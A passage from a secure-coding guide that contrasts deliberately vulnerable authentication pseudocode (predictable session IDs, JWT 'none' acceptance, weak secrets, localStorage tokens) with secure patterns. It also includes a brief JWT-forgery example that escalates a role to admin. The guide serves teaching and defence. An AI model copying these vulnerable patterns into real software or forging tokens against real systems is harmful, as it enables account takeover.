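JWT misunderstandings: JSON Web Tokens have become the default recommendation, yet AI models frequently generate JWT implementations with serious flaws: "none" algorithm vulnerabilities, weak secrets, improper validation, and insecure storage.
Framework diversity: Authentication patterns differ enormously across frameworks (Passport.js, Spring Security, Django, Rails Devise, and others). AI models blend patterns from different frameworks, producing hybrid code that fits no framework and is not secure.
Stateless vs. stateful confusion: The shift toward stateless authentication (JWT) has left mixed patterns in the training data. AI often combines stateless token concepts with stateful session assumptions, creating logic gaps in security.
Edge-case blind spots: Authentication edge cases (concurrent sessions, password reset flows, account recovery, multi-factor authentication, and OAuth state management) demand deep security reasoning that AI models do not produce reliably.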

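Impact statistics:

75.8% of developers believe AI-generated authentication code is secure (Snyk State of AI Security survey, 2024)
63% of data breaches involve weak, default, or stolen passwords (Verizon DBIR 2024)
Authentication bypass vulnerabilities account for 41% of critical web application vulnerabilities (HackerOne report)
Average cost of a credential stuffing attack: $4.3 million (Ponemon Institute)
Only 23% of AI-generated authentication code correctly implements session invalidation on logout.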

Bad Examples: Multiple Manifestations

Bad Example 1: Weak Password Validation

// VULNERABLE: Minimal password requirements
function validatePassword(password):
    if length(password) < 6:
        return false
    return true

// VULNERABLE: Only checks length, no complexity
function registerUser(email, password):
    if length(password) >= 8:  // "Strong enough"
        hashedPassword = hashPassword(password)
        createUser(email, hashedPassword)
        return success
    return error("Password too short")

// VULNERABLE: Pattern allows easy-to-guess passwords
function isValidPassword(password):
    // Only requires one of each - easily satisfied by "Password1!"
    hasUpper = containsUppercase(password)
    hasLower = containsLowercase(password)
    hasNumber = containsNumber(password)
    hasSpecial = containsSpecialChar(password)

    if hasUpper and hasLower and hasNumber and hasSpecial:
        return true
    return false
    // Missing: dictionary check, common password check, breach check

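Why this is dangerous:

Allows passwords such as "123456", "password", or "qwerty123"
No protection against common-password lists
No check against breached passwords (Have I Been Pwned)
Pattern requirements are easily satisfied by predictable passwords (e.g., "Password1!").
With modern hardware, attackers can crack weak passwords in seconds.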

Bad Example 2: Predictable Session Tokens

// VULNERABLE: Sequential session IDs
sessionCounter = 1000

function generateSessionId():
    sessionCounter = sessionCounter + 1
    return "session_" + toString(sessionCounter)

// VULNERABLE: Time-based session generation
function createSessionToken():
    timestamp = getCurrentTimestamp()
    return "sess_" + toString(timestamp)

// VULNERABLE: Weak random source
function generateToken():
    return "token_" + toString(randomInteger(0, 999999))

// VULNERABLE: MD5 of predictable data
function createAuthToken(userId):
    timestamp = getCurrentTimestamp()
    return md5(toString(userId) + toString(timestamp))

// VULNERABLE: User-controlled seed
function generateSessionId(userId, email):
    seed = userId + email + getCurrentDate()
    return sha256(seed)  // Deterministic - same inputs = same output

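Why this is dangerous:

Sequential IDs allow session enumeration: an attacker can guess valid sessions.
Timestamp-based tokens can be predicted if the attacker knows the approximate creation time.
Weak random sources (Math.random, random.randint) are not cryptographically secure, so their output can be predicted.
MD5 is fast to compute, which makes brute-force attacks practical.
User-controlled inputs to token generation let an attacker predict the token.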
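For contrast with the predictable generators above, a minimal Python sketch of an unpredictable identifier follows. It uses the standard `secrets` module, which draws from the operating system's CSPRNG; the function name `generate_session_id` is simply borrowed from the pseudocode.

```python
import secrets


def generate_session_id() -> str:
    """Return 256 bits from the OS CSPRNG as 64 hexadecimal characters."""
    return secrets.token_hex(32)
```

Nothing about the user, the clock, or a counter feeds into the value, so knowing when or for whom a session was created gives an attacker no head start.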

Bad Example 3: Session Fixation Vulnerabilities

// VULNERABLE: Session ID not regenerated after login
function login(request):
    email = request.body.email
    password = request.body.password

    user = findUserByEmail(email)
    if user and verifyPassword(password, user.hashedPassword):
        // Using the SAME session ID from before authentication
        request.session.userId = user.id
        request.session.authenticated = true
        return redirect("/dashboard")
    return error("Invalid credentials")

// VULNERABLE: Accepting session ID from URL parameter
function handleRequest(request):
    sessionId = request.query.sessionId or request.cookies.sessionId
    // Attacker can send victim: https://app.com/login?sessionId=attacker_controlled_session
    session = loadSession(sessionId)

// VULNERABLE: Not invalidating session on privilege change
function promoteToAdmin(request):
    user = getCurrentUser(request)
    user.role = "admin"
    user.save()
    // Same session continues - if session was compromised before,
    // attacker now has admin access
    return success("You are now an admin")

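Why this is dangerous:

The attacker sets a session ID → the victim logs in → the attacker uses the same session ID, which is now the victim's authenticated session
URL-based session IDs end up in server logs, browser history, and Referer headers.
Escalating privileges without regenerating the session means a compromised session gains the elevated access.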
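The fixation scenario, and the effect of regenerating the ID, can be sketched with an in-memory store. Everything here is hypothetical scaffolding (`_sessions`, `start_anonymous_session`, `login`, `current_user`), and the sketch assumes credentials were already verified before `login` is called.

```python
import secrets
from typing import Dict, Optional

# Hypothetical in-memory store; a real deployment would use Redis or a database.
_sessions: Dict[str, dict] = {}


def start_anonymous_session() -> str:
    """Create a pre-login session, as happens on a first page visit."""
    session_id = secrets.token_hex(32)
    _sessions[session_id] = {"user_id": None}
    return session_id


def login(old_session_id: Optional[str], user_id: int) -> str:
    """Discard the pre-login session and issue a fresh ID bound to the user."""
    if old_session_id is not None:
        _sessions.pop(old_session_id, None)
    new_session_id = secrets.token_hex(32)
    _sessions[new_session_id] = {"user_id": user_id}
    return new_session_id


def current_user(session_id: str) -> Optional[int]:
    """Return the user bound to a session, or None if it is unknown."""
    session = _sessions.get(session_id)
    return session["user_id"] if session else None
```

An ID that the attacker planted before login is deleted at the moment of authentication, so it never becomes an authenticated session.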

Bad Example 4: Accepting the JWT "none" Algorithm

// VULNERABLE: Decoding JWT without algorithm verification
function verifyJwt(token):
    parts = token.split(".")
    header = base64Decode(parts[0])
    payload = base64Decode(parts[1])

    // Trusting the algorithm from the token header itself!
    algorithm = header.alg

    if algorithm == "none":
        return payload  // No signature check!

    signature = parts[2]
    if verifySignature(payload, signature, algorithm):
        return payload
    return null

// VULNERABLE: Using jwt library without specifying expected algorithm
function validateToken(token):
    try:
        // Library may accept 'none' algorithm if token specifies it
        decoded = jwt.decode(token, secretKey)
        return decoded
    catch:
        return null

// VULNERABLE: Allowing multiple algorithms including none
function verifyToken(token, secret):
    options = {
        algorithms: ["HS256", "HS384", "HS512", "none"]  // DANGEROUS
    }
    return jwt.verify(token, secret, options)

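Why this is dangerous:

The attacker modifies the JWT header to specify alg: "none" and removes the signature.
The server accepts the unsigned token as valid.
This vulnerability has affected major JWT libraries across multiple languages.
Complete authentication bypass: the attacker can impersonate any user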

Exploit example:

// Original legitimate token:
// Header: {"alg":"HS256","typ":"JWT"}
// Payload: {"sub":"1234","role":"user"}
// Signature: valid_signature_here

// Attacker-modified token:
// Header: {"alg":"none","typ":"JWT"}  ← Changed to "none"
// Payload: {"sub":"1234","role":"admin"}  ← Changed to admin
// Signature: (empty)  ← Removed

// If server trusts header.alg, this forged token is accepted as valid

Bad Example 5: Weak JWT Secrets

// VULNERABLE: Short/guessable secret
JWT_SECRET = "secret"

// VULNERABLE: Common secrets from tutorials
JWT_SECRET = "your-256-bit-secret"
JWT_SECRET = "supersecretkey"
JWT_SECRET = "jwt-secret-key"

// VULNERABLE: Empty or null secret
function createToken(payload):
    secret = getConfig("JWT_SECRET") or ""  // Falls back to empty string
    return jwt.sign(payload, secret, {algorithm: "HS256"})

// VULNERABLE: Secret derived from predictable data
function getJwtSecret():
    return sha256(APPLICATION_NAME + "-" + ENVIRONMENT)
    // If attacker knows app name and environment, they can derive the secret

// VULNERABLE: Same secret for signing and encryption
JWT_SECRET = "shared_secret_for_everything"
function signToken(payload):
    return jwt.sign(payload, JWT_SECRET)
function encryptData(data):
    return aesEncrypt(data, JWT_SECRET)  // Key reuse vulnerability

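Why this is dangerous:

Weak secrets can be brute-forced or found in dictionaries.
Common tutorial secrets appear in public JWT secret wordlists.
Some JWT libraries may accept an empty secret.
A leaked secret means any JWT can be forged, bypassing authentication entirely.
Reusing one key across different cryptographic operations violates key-separation principles.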
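One way to avoid the empty-string fallback and the tutorial secrets shown above is to fail at startup when the secret is missing or short. The sketch below assumes the secret lives in an environment variable; `generate_jwt_secret`, `load_jwt_secret`, and the 32-byte floor are illustrative choices, and a length check is only a floor, not a measure of randomness.

```python
import os
import secrets

MIN_SECRET_BYTES = 32  # 256 bits, matching the HMAC-SHA256 output size


def generate_jwt_secret() -> str:
    """Create a random secret to place in the environment or a secret manager."""
    return secrets.token_urlsafe(MIN_SECRET_BYTES)


def load_jwt_secret(env_var: str = "JWT_SECRET") -> bytes:
    """Read the secret from the environment and refuse missing or short values."""
    value = os.environ.get(env_var, "")
    if len(value.encode("utf-8")) < MIN_SECRET_BYTES:
        raise RuntimeError(f"{env_var} must be set to at least {MIN_SECRET_BYTES} bytes")
    return value.encode("utf-8")
```

Raising an error is deliberate: an application that refuses to start is easier to notice than one that silently signs tokens with an empty key.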

Bad Example 6: Storing Tokens in localStorage

// VULNERABLE: Storing JWT in localStorage
function handleLoginResponse(response):
    accessToken = response.data.accessToken
    refreshToken = response.data.refreshToken

    // localStorage is accessible to ANY JavaScript on the page
    localStorage.setItem("access_token", accessToken)
    localStorage.setItem("refresh_token", refreshToken)

    // Also stored user data in localStorage
    localStorage.setItem("user", JSON.stringify(response.data.user))

// VULNERABLE: Retrieving token for API calls
function apiRequest(endpoint, data):
    token = localStorage.getItem("access_token")
    return fetch(endpoint, {
        headers: {
            "Authorization": "Bearer " + token
        },
        body: JSON.stringify(data)
    })

// VULNERABLE: Token in sessionStorage (same problem)
function storeToken(token):
    sessionStorage.setItem("jwt", token)

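Why this is dangerous:

Any JavaScript running on the page can read localStorage.
An XSS vulnerability = complete authentication compromise
Tokens persist across browser sessions (localStorage)
No protection against browser extensions reading storage
A refresh token in localStorage enables long-term account takeover.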

Bad Example 7: Missing Token Expiration

// VULNERABLE: JWT without expiration
function createUserToken(user):
    payload = {
        userId: user.id,
        email: user.email,
        role: user.role
        // No "exp" claim!
    }
    return jwt.sign(payload, JWT_SECRET)

// VULNERABLE: Extremely long expiration
function generateToken(user):
    payload = {
        sub: user.id,
        iat: now(),
        exp: now() + (365 * 24 * 60 * 60)  // 1 year expiration
    }
    return jwt.sign(payload, JWT_SECRET)

// VULNERABLE: Trusting token-provided expiration without server check
function validateToken(token):
    decoded = jwt.verify(token, JWT_SECRET)
    // JWT library checks exp, but server has no session to revoke
    // Compromised tokens valid until natural expiration
    return decoded

// VULNERABLE: No mechanism to invalidate tokens
function logout(request):
    response.clearCookie("token")
    return success("Logged out")
    // Token is still valid! Anyone with the token can still use it

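Why this is dangerous:

A token with no expiration stays valid forever unless the signing secret changes.
Long-lived tokens widen the attacker's window.
Without server-side invalidation, a stolen token cannot be revoked.
Logout only removes the token from the client; it does not invalidate it.
Stolen tokens remain valid even after a password change.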

Good Examples: Secure Authentication Patterns

Good Example 1: Strong Password Requirements Pattern

// SECURE: Comprehensive password validation
import commonPasswordList from "common-passwords-database"
import breachedPasswordApi from "haveibeenpwned-api"

async function validatePasswordStrength(password):  // async because it awaits the breach check
    errors = []

    // Minimum length (NIST recommends 8+, many orgs use 12+)
    if length(password) < 12:
        errors.push("Password must be at least 12 characters")

    // Maximum length (prevent DoS from hashing extremely long passwords)
    if length(password) > 128:
        errors.push("Password cannot exceed 128 characters")

    // Check against common password list (10,000+ passwords)
    if password.toLowerCase() in commonPasswordList:
        errors.push("This password is too common")

    // Check against user-specific data (optional but recommended)
    // - Don't allow email prefix as password
    // - Don't allow username as password

    // Check against breached passwords (Have I Been Pwned API)
    if await checkBreachedPassword(password):
        errors.push("This password has appeared in a data breach")

    if length(errors) > 0:
        return { valid: false, errors: errors }

    return { valid: true, errors: [] }

// SECURE: Check breached passwords using k-anonymity (no password exposure)
async function checkBreachedPassword(password):
    // Hash password with SHA-1 (HIBP API requirement)
    hash = sha1(password).toUpperCase()
    prefix = hash.substring(0, 5)
    suffix = hash.substring(5)

    // Only send first 5 characters - k-anonymity preserves privacy
    response = await fetch("https://api.pwnedpasswords.com/range/" + prefix)
    hashes = await response.text()

    // Check if our suffix appears in the returned hashes
    for line in hashes.split("\n"):
        parts = line.split(":")
        if parts[0] == suffix:
            return true  // Password has been breached

    return false

// SECURE: Password hashing with proper algorithm
function hashPassword(password):
    // bcrypt with cost factor of 12 (adjust based on hardware)
    // Alternatively: argon2id with recommended parameters
    return bcrypt.hash(password, 12)

function verifyPassword(password, hash):
    return bcrypt.compare(password, hash)

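Why this is secure:

The length requirement blocks passwords that are too short.
The common-password check blocks dictionary attacks
The breach check prevents credential stuffing with already-leaked passwords.
k-anonymity ensures the password is never disclosed during the breach check.
bcrypt/argon2 provide proper password hashing with a tunable work factor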
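The k-anonymity step can be isolated from the network call. In the sketch below, `split_sha1_for_range_query` produces the five-character prefix that would be sent to the range endpoint, and `suffix_in_range_response` scans a response body of `SUFFIX:COUNT` lines. Both names are hypothetical, and the HTTP request itself is left out so the example stays offline.

```python
import hashlib
from typing import Tuple


def split_sha1_for_range_query(password: str) -> Tuple[str, str]:
    """Return (prefix, suffix) of the uppercase SHA-1 hex digest."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    # Only the 5-character prefix ever leaves the server.
    return digest[:5], digest[5:]


def suffix_in_range_response(suffix: str, response_body: str) -> bool:
    """Check a range response made of 'SUFFIX:COUNT' lines for our suffix."""
    for line in response_body.splitlines():
        candidate, _, _count = line.strip().partition(":")
        if candidate.upper() == suffix:
            return True
    return False
```

SHA-1 appears here only because the range API is keyed on it; it plays no part in how the password is stored.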

Good Example 2: Secure Session Generation

// SECURE: Cryptographically random session IDs
import cryptoRandom from "secure-random-library"

function generateSessionId():
    // 256 bits of cryptographically secure randomness
    // Represented as 64 hex characters
    randomBytes = cryptoRandom.getRandomBytes(32)
    return bytesToHex(randomBytes)

// SECURE: Session creation with proper attributes
function createSession(userId):
    sessionId = generateSessionId()

    sessionData = {
        id: sessionId,
        userId: userId,
        createdAt: now(),
        expiresAt: now() + SESSION_DURATION,  // e.g., 24 hours
        lastActivityAt: now(),
        ipAddress: getClientIP(),
        userAgent: getUserAgent()
    }

    // Store in server-side session store (Redis, database, etc.)
    sessionStore.save(sessionId, sessionData)

    return sessionId

// SECURE: Session ID regeneration after authentication
function login(request):
    email = request.body.email
    password = request.body.password

    user = findUserByEmail(email)
    if not user:
        return error("Invalid credentials")  // Don't reveal if email exists

    if not verifyPassword(password, user.hashedPassword):
        recordFailedLogin(user.id, getClientIP())
        return error("Invalid credentials")

    // CRITICAL: Destroy old session and create new one
    if request.session.id:
        sessionStore.delete(request.session.id)

    // Generate completely new session ID after authentication
    newSessionId = createSession(user.id)

    // Set session cookie with secure attributes
    response.setCookie("session_id", newSessionId, {
        httpOnly: true,      // Prevent XSS access
        secure: true,        // HTTPS only
        sameSite: "Strict",  // CSRF protection
        path: "/",
        maxAge: SESSION_DURATION
    })

    return redirect("/dashboard")

// SECURE: Session regeneration on privilege change
function changeUserRole(request, newRole):
    user = getCurrentUser(request)

    // Change the role
    user.role = newRole
    user.save()

    // Regenerate session to bind new privileges to fresh session
    oldSessionId = request.cookies.session_id
    sessionStore.delete(oldSessionId)

    newSessionId = createSession(user.id)

    response.setCookie("session_id", newSessionId, {
        httpOnly: true,
        secure: true,
        sameSite: "Strict"
    })

    return success("Role updated")

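Why this is secure:

Cryptographically random session IDs prevent prediction/enumeration
Regenerating the session after login prevents session fixation.
Privilege changes trigger session regeneration
Secure cookie attributes block common attack vectors
Server-side session storage allows proper invalidation.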

Good Example 3: Correct JWT Validation

// SECURE: JWT configuration with strict settings
JWT_CONFIG = {
    secret: getEnv("JWT_SECRET"),  // 256+ bit secret from environment
    algorithms: ["HS256"],          // Single allowed algorithm - explicit!
    issuer: "myapp.example.com",
    audience: "myapp-users",
    expiresIn: "15m"                // Short-lived access tokens
}

// SECURE: Token creation with explicit claims
function createAccessToken(user):
    payload = {
        sub: toString(user.id),
        email: user.email,
        role: user.role,
        iss: JWT_CONFIG.issuer,
        aud: JWT_CONFIG.audience,
        iat: now(),
        exp: now() + (15 * 60),     // 15 minutes
        jti: generateUUID()          // Unique token ID for revocation
    }

    return jwt.sign(payload, JWT_CONFIG.secret, {
        algorithm: "HS256"           // Explicit algorithm
    })

// SECURE: Token verification with all claims checked
async function verifyAccessToken(token):  // async because it awaits the revocation lookup
    try:
        decoded = jwt.verify(token, JWT_CONFIG.secret, {
            algorithms: ["HS256"],   // ONLY accept HS256
            issuer: JWT_CONFIG.issuer,
            audience: JWT_CONFIG.audience,
            complete: true           // Return header + payload
        })

        // Additional validation
        if not decoded.payload.sub:
            return { valid: false, error: "Missing subject" }

        if not decoded.payload.role:
            return { valid: false, error: "Missing role" }

        // Check against token blacklist (for logout/revocation)
        if await isTokenRevoked(decoded.payload.jti):
            return { valid: false, error: "Token revoked" }

        return { valid: true, payload: decoded.payload }

    catch JwtExpiredError:
        return { valid: false, error: "Token expired" }
    catch JwtInvalidError as e:
        return { valid: false, error: "Invalid token: " + e.message }

// SECURE: Refresh token handling
function createRefreshToken(user, sessionId):
    payload = {
        sub: toString(user.id),
        sid: sessionId,              // Bind to session for revocation
        type: "refresh",
        iat: now(),
        exp: now() + (7 * 24 * 60 * 60)  // 7 days
    }

    token = jwt.sign(payload, JWT_CONFIG.secret + "_refresh", {
        algorithm: "HS256"
    })

    // Store refresh token hash in database for revocation
    tokenHash = sha256(token)
    storeRefreshToken(user.id, sessionId, tokenHash, payload.exp)

    return token

// SECURE: Refresh flow with rotation
function refreshAccessToken(refreshToken):
    try:
        decoded = jwt.verify(refreshToken, JWT_CONFIG.secret + "_refresh", {
            algorithms: ["HS256"]
        })

        // Verify refresh token is still valid in database
        tokenHash = sha256(refreshToken)
        storedToken = getRefreshToken(decoded.sub, tokenHash)

        if not storedToken or storedToken.revoked:
            return { error: "Refresh token invalid or revoked" }

        // Rotate refresh token (issue new one, revoke old)
        revokeRefreshToken(tokenHash)

        user = findUserById(decoded.sub)
        newAccessToken = createAccessToken(user)
        newRefreshToken = createRefreshToken(user, decoded.sid)

        return {
            accessToken: newAccessToken,
            refreshToken: newRefreshToken
        }

    catch:
        return { error: "Invalid refresh token" }

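Why this is secure:

Explicit algorithm specification prevents algorithm confusion attacks.
Short-lived access tokens minimize the exposure window.
The JTI (JWT ID) enables token revocation
Refresh token rotation limits replay attacks
Complete claim validation (iss, aud, exp, sub)
Access tokens and refresh tokens use different keys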

Good Example 4: HttpOnly Secure Cookie Usage

// SECURE: Cookie-based session with proper attributes
function setSessionCookie(response, sessionId):
    response.setCookie("session_id", sessionId, {
        httpOnly: true,      // Cannot be accessed via JavaScript
        secure: true,        // Only sent over HTTPS
        sameSite: "Strict",  // Not sent with cross-site requests
        path: "/",           // Available for all paths
        domain: ".myapp.com", // Shared with subdomains; omit for a host-only cookie if any subdomain is untrusted
        maxAge: 24 * 60 * 60  // 24 hours in seconds
    })

// SECURE: JWT in cookie (not localStorage)
function setAuthCookies(response, accessToken, refreshToken):
    // Access token - short lived, same-site strict
    response.setCookie("access_token", accessToken, {
        httpOnly: true,
        secure: true,
        sameSite: "Strict",
        path: "/",
        maxAge: 15 * 60       // 15 minutes
    })

    // Refresh token - limited path to reduce exposure
    response.setCookie("refresh_token", refreshToken, {
        httpOnly: true,
        secure: true,
        sameSite: "Strict",
        path: "/auth/refresh",  // Only sent to refresh endpoint
        maxAge: 7 * 24 * 60 * 60  // 7 days
    })

// SECURE: Cookie cleanup on logout
function clearAuthCookies(response):
    // Set cookies with immediate expiration
    response.setCookie("access_token", "", {
        httpOnly: true,
        secure: true,
        sameSite: "Strict",
        path: "/",
        maxAge: 0             // Immediate expiration
    })

    response.setCookie("refresh_token", "", {
        httpOnly: true,
        secure: true,
        sameSite: "Strict",
        path: "/auth/refresh",
        maxAge: 0
    })

// SECURE: SameSite considerations for cross-origin needs
function setCookieForOAuth(response, stateToken):
    // OAuth requires cookies to work across redirects
    // Use Lax instead of Strict when necessary
    response.setCookie("oauth_state", stateToken, {
        httpOnly: true,
        secure: true,
        sameSite: "Lax",      // Allows top-level navigation
        path: "/auth/callback",
        maxAge: 10 * 60       // 10 minutes for OAuth flow
    })

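Why this is secure:

HttpOnly prevents XSS from stealing the token.
The Secure flag ensures transmission over HTTPS only
SameSite protects against CSRF attacks
Path restrictions limit which requests carry the cookie
A short maxAge limits the exposure window
Correct domain scoping limits subdomain attacks (a host-only cookie, with no Domain attribute, is the narrowest scope)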
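The same attributes can be produced with Python's standard `http.cookies` module, as in the sketch below. `build_session_cookie` is a hypothetical helper that returns the value of a `Set-Cookie` header; most web frameworks expose equivalent keyword arguments on their own response objects.

```python
from http.cookies import SimpleCookie


def build_session_cookie(session_id: str, max_age_seconds: int = 24 * 60 * 60) -> str:
    """Return a Set-Cookie header value for a hardened session cookie."""
    cookie = SimpleCookie()
    cookie["session_id"] = session_id
    morsel = cookie["session_id"]
    morsel["httponly"] = True        # not readable from JavaScript
    morsel["secure"] = True          # sent over HTTPS only
    morsel["samesite"] = "Strict"    # withheld from cross-site requests
    morsel["path"] = "/"
    morsel["max-age"] = max_age_seconds
    # No Domain attribute is set, so the cookie stays host-only.
    return morsel.OutputString()
```

Leaving the Domain attribute out is a deliberate choice in this sketch: the browser then sends the cookie only to the exact host that set it.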

Good Example 5: Token Refresh Pattern

// SECURE: Complete token refresh implementation
class AuthenticationService:

    ACCESS_TOKEN_DURATION = 15 * 60          // 15 minutes
    REFRESH_TOKEN_DURATION = 7 * 24 * 60 * 60  // 7 days
    REFRESH_TOKEN_REUSE_WINDOW = 60           // 1 minute grace period

    function login(email, password):
        user = validateCredentials(email, password)
        if not user:
            return { error: "Invalid credentials" }

        // Create session for tracking
        session = createSession(user.id)

        // Generate token pair
        accessToken = createAccessToken(user)
        refreshToken = createRefreshToken(user, session.id)

        return {
            accessToken: accessToken,
            refreshToken: refreshToken,
            expiresIn: ACCESS_TOKEN_DURATION
        }

    function refresh(refreshToken):
        // Validate refresh token
        decoded = verifyRefreshToken(refreshToken)
        if not decoded.valid:
            return { error: decoded.error }

        // Check token in database
        tokenRecord = getRefreshTokenRecord(decoded.jti)

        if not tokenRecord:
            // Token doesn't exist - possible theft, invalidate session
            invalidateSessionTokens(decoded.sid)
            return { error: "Invalid refresh token" }

        if tokenRecord.revoked:
            // Reuse of revoked token - likely theft
            // Revoke ALL tokens for this session
            invalidateSessionTokens(decoded.sid)
            logSecurityEvent("Refresh token reuse detected", decoded.sub)
            return { error: "Security violation detected" }

        if tokenRecord.usedAt:
            // Token was already used - check if within grace period
            if now() - tokenRecord.usedAt > REFRESH_TOKEN_REUSE_WINDOW:
                // Outside grace period - potential theft
                invalidateSessionTokens(decoded.sid)
                return { error: "Refresh token already used" }
            // Within grace period - return same tokens (replay protection)
            return tokenRecord.lastIssuedTokens

        // Mark token as used
        tokenRecord.usedAt = now()
        tokenRecord.save()

        // Generate new token pair (rotation)
        user = findUserById(decoded.sub)
        newAccessToken = createAccessToken(user)
        newRefreshToken = createRefreshToken(user, decoded.sid)

        // Store new tokens for replay protection
        tokenRecord.lastIssuedTokens = {
            accessToken: newAccessToken,
            refreshToken: newRefreshToken
        }
        tokenRecord.save()

        // Revoke old refresh token (after grace period, it's invalid)
        scheduleTokenRevocation(decoded.jti, REFRESH_TOKEN_REUSE_WINDOW)

        return {
            accessToken: newAccessToken,
            refreshToken: newRefreshToken,
            expiresIn: ACCESS_TOKEN_DURATION
        }

    function logout(accessToken, refreshToken):
        // Revoke access token (add to blacklist until expiry)
        decoded = decodeToken(accessToken)
        if decoded:
            blacklistToken(decoded.jti, decoded.exp)

        // Revoke refresh token immediately
        refreshDecoded = decodeToken(refreshToken)
        if refreshDecoded:
            revokeRefreshToken(refreshDecoded.jti)

        // Optionally invalidate entire session
        if refreshDecoded and refreshDecoded.sid:
            invalidateSession(refreshDecoded.sid)

        return { success: true }

    function logoutAll(userId):
        // Invalidate all sessions for user (password change, security concern)
        sessions = getSessionsForUser(userId)
        for session in sessions:
            invalidateSessionTokens(session.id)
            deleteSession(session.id)

        return { success: true, sessionsInvalidated: length(sessions) }

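Why this is secure:

Refresh token rotation limits replay attacks.
Token reuse detection flags potential theft.
A grace period avoids breaking legitimate concurrent requests.
Full logout invalidates tokens on the server side.
Session binding enables "log out from all devices".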
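
The rotation and reuse-detection logic above can be sketched in Python. This is a minimal illustration, not a definitive implementation: it assumes opaque random token IDs instead of signed JWTs, and `RefreshTokenStore`, `REUSE_WINDOW_SECONDS`, and the in-memory dictionaries are hypothetical stand-ins for a real database table.

```python
import secrets
import time

REUSE_WINDOW_SECONDS = 10  # assumed grace period for concurrent requests


class RefreshTokenStore:
    """In-memory stand-in for a refresh-token table (hypothetical)."""

    def __init__(self):
        self.records = {}              # token id -> record
        self.revoked_sessions = set()  # session ids whose tokens are all invalid

    def issue(self, session_id):
        token_id = secrets.token_urlsafe(32)
        self.records[token_id] = {"sid": session_id, "used_at": None, "next": None}
        return token_id

    def rotate(self, token_id, now=None):
        """Return the successor token id, or None if the request is rejected."""
        now = time.time() if now is None else now
        record = self.records.get(token_id)
        if record is None or record["sid"] in self.revoked_sessions:
            return None
        if record["used_at"] is not None:
            if now - record["used_at"] > REUSE_WINDOW_SECONDS:
                # Reuse outside the grace period: treat as theft, kill the session.
                self.revoked_sessions.add(record["sid"])
                return None
            # Concurrent retry inside the grace period: hand back the same successor.
            return record["next"]
        record["used_at"] = now
        record["next"] = self.issue(record["sid"])
        return record["next"]
```

Returning the same successor inside the grace window keeps two parallel browser requests from logging the user out, while any later replay revokes the whole session.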

GOOD Example 6: Proper Logout (Token Invalidation)

// SECURE: Complete logout implementation
function logout(request):
    // Get current session/tokens
    accessToken = request.cookies.access_token
    refreshToken = request.cookies.refresh_token
    sessionId = request.session.id

    // Revoke access token (add to blacklist)
    if accessToken:
        decoded = decodeToken(accessToken)
        if decoded:
            // Add to Redis/cache blacklist with TTL matching token expiry
            blacklistToken(decoded.jti, decoded.exp - now())

    // Revoke refresh token in database
    if refreshToken:
        refreshDecoded = decodeToken(refreshToken)
        if refreshDecoded:
            markRefreshTokenRevoked(refreshDecoded.jti)

    // Delete server-side session
    if sessionId:
        sessionStore.delete(sessionId)

    // Clear client cookies
    response = new Response()
    clearAuthCookies(response)

    return response.redirect("/login")

// SECURE: Token blacklist with automatic expiry
class TokenBlacklist:
    // Use Redis or similar with TTL support

    function add(tokenId, ttlSeconds):
        redis.setex("blacklist:" + tokenId, ttlSeconds, "revoked")

    function isBlacklisted(tokenId):
        return redis.exists("blacklist:" + tokenId)

// SECURE: Middleware to check token validity
function authMiddleware(request, next):
    accessToken = request.cookies.access_token

    if not accessToken:
        return redirect("/login")

    decoded = verifyAccessToken(accessToken)

    if not decoded.valid:
        return redirect("/login")

    // Check blacklist
    if tokenBlacklist.isBlacklisted(decoded.payload.jti):
        return redirect("/login")

    // Token is valid and not revoked
    request.user = decoded.payload
    return next(request)

// SECURE: Logout from all sessions
function logoutAllSessions(request):
    userId = request.user.sub

    // Get all active sessions for user
    sessions = sessionStore.findByUserId(userId)

    // Revoke all refresh tokens
    refreshTokens = getRefreshTokensForUser(userId)
    for token in refreshTokens:
        markRefreshTokenRevoked(token.jti)

    // Delete all sessions
    for session in sessions:
        sessionStore.delete(session.id)

    // Add all user's recent access tokens to blacklist
    // This requires tracking issued tokens or using short expiry
    invalidateAllAccessTokensForUser(userId)

    return success("Logged out from all devices")

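Why this is secure:

Server-side revocation makes logout take effect immediately.
The blacklist prevents revoked tokens from being used.
Automatic TTL cleanup keeps the blacklist from growing without bound.
"Log out from all devices" handles compromised sessions.
Clearing cookies removes the client-side references.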
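
As a rough Python sketch of the blacklist-with-TTL idea, the class below keeps revoked token IDs only until the token would have expired anyway. It is an in-process stand-in for the Redis `SETEX` approach shown above; `InMemoryTokenBlacklist` and its injectable `clock` parameter are assumptions made for illustration.

```python
import time


class InMemoryTokenBlacklist:
    """Revoked-token set whose entries disappear once the token has expired."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._expires_at = {}  # jti -> absolute expiry timestamp of the token

    def add(self, jti, token_exp):
        # An already-expired token is rejected by expiry checks, so skip it.
        if token_exp - self._clock() <= 0:
            return
        self._expires_at[jti] = token_exp

    def is_blacklisted(self, jti):
        expires_at = self._expires_at.get(jti)
        if expires_at is None:
            return False
        if expires_at <= self._clock():
            # Lazy cleanup keeps the structure from growing without bound.
            del self._expires_at[jti]
            return False
        return True
```

A shared store such as Redis is still needed when several application instances must see the same revocations.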

Edge Cases Section

Edge Case 1: Race Conditions in Authentication

// VULNERABLE: Race condition in login attempts
function login(email, password):
    user = findUserByEmail(email)
    failedAttempts = getFailedAttempts(email)

    if failedAttempts >= MAX_ATTEMPTS:
        return error("Account locked")

    // Race condition: two requests check simultaneously,
    // both see failedAttempts = 4, both proceed
    if not verifyPassword(password, user.hashedPassword):
        incrementFailedAttempts(email)  // Not atomic!
        return error("Invalid credentials")

    resetFailedAttempts(email)
    return success()

// SECURE: Atomic rate limiting
function loginWithAtomicRateLimit(email, password):
    // Atomic increment and check in single operation
    result = redis.eval(`
        local attempts = redis.call('INCR', KEYS[1])
        if attempts == 1 then
            redis.call('EXPIRE', KEYS[1], 900)  -- 15 minute window
        end
        return attempts
    `, ["login_attempts:" + email])

    if result > MAX_ATTEMPTS:
        return error("Too many attempts. Try again later.")

    user = findUserByEmail(email)
    if not user or not verifyPassword(password, user.hashedPassword):
        return error("Invalid credentials")

    // Reset on success
    redis.del("login_attempts:" + email)
    return success()

// VULNERABLE: Race condition in concurrent session check
function login(email, password, request):
    user = authenticate(email, password)

    activeSessions = countActiveSessions(user.id)
    if activeSessions >= MAX_SESSIONS:
        return error("Too many active sessions")

    // Race: two logins pass the check simultaneously
    createSession(user.id)  // Now user has MAX_SESSIONS + 1
    return success()

// SECURE: Use database constraints or atomic operations
function loginWithSessionLimit(email, password, request):
    user = authenticate(email, password)

    // Use transaction with row lock
    transaction.start()
    try:
        activeSessions = countActiveSessionsForUpdate(user.id)  // SELECT FOR UPDATE
